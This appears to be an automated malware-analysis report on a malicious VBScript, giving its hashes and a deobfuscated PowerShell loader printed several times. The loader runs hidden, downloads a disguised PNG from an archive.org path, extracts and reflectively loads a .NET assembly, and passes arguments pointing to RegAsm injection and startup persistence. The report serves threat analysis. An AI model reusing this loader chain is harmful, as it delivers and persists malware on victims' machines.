Malicious

884ce2d08babefbaf8058a21e0f5df9f

VBScript | MD5: 884ce2d08babefbaf8058a21e0f5df9f | Size: 1.97 MB | text/vbscript

Characteristics
MD5: 884ce2d08babefbaf8058a21e0f5df9f
Sha1: 3ff1c6f0127349a358f53f04ae5fa1974d2d11b6
Sha256: a1ac02a03b7f08e18a025ba93df774106bb832160755290609d8e648f1502e1e
Sha384: f2c101f9ee00838c530f462479b3a0068252c4e855b5677a58a0b404c8aa8fc242a9ac637966daec81dcd0d3c2580ae7
Sha512: 8fc524b6d220f7497ee6ad0aa63a8f80664b58cd87655c2e6a805fda0bc9dd2ecdb42e1e95032e509c08a4ef1878fc4d0261c4918e8a55831378dea9a7f467df
SSDeep: 24576:uY54P3Ow7tY54P3Ow7tY54P3Ow7kY54P3Ow7tY54P3Ow74:uFW4FW4FWhFW4FW5
TLSH: EF95E1CAB94D5784488672FA65388662F5DDC3E03306D7A2EE38C65473C28F8D97B781

884ce2d08babefbaf8058a21e0f5df9f (1.97 MB)
No malware configuration was found at this point.
Artefacts
Name
Value Location
URLs in VB Code - #1

http://www.ostrosoft.com/smtp.html

884ce2d08babefbaf8058a21e0f5df9f

Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression"

Malicious

884ce2d08babefbaf8058a21e0f5df9f > 884ce2d08babefbaf8058a21e0f5df9f.deobfuscated.vbs > [Command #0]

Deobfuscated PowerShell

Invoke-Expression

Malicious

884ce2d08babefbaf8058a21e0f5df9f > 884ce2d08babefbaf8058a21e0f5df9f.deobfuscated.vbs > [Command #0] > [PowerShell Command]

Deobfuscated PowerShell

Invoke-Expression

Malicious

884ce2d08babefbaf8058a21e0f5df9f > 884ce2d08babefbaf8058a21e0f5df9f.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS]

Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } ))

Malicious

884ce2d08babefbaf8058a21e0f5df9f > 884ce2d08babefbaf8058a21e0f5df9f.deobfuscated.vbs > [Command #0] > [Base64-Block]

Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression"

Malicious

884ce2d08babefbaf8058a21e0f5df9f > 884ce2d08babefbaf8058a21e0f5df9f.deobfuscated.vbs > [Command #0] > [Deobfuscated PS]

Deobfuscated PowerShell

Invoke-Expression

Malicious

884ce2d08babefbaf8058a21e0f5df9f > 884ce2d08babefbaf8058a21e0f5df9f.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command]

Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } ))

Malicious

884ce2d08babefbaf8058a21e0f5df9f > 884ce2d08babefbaf8058a21e0f5df9f.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS]
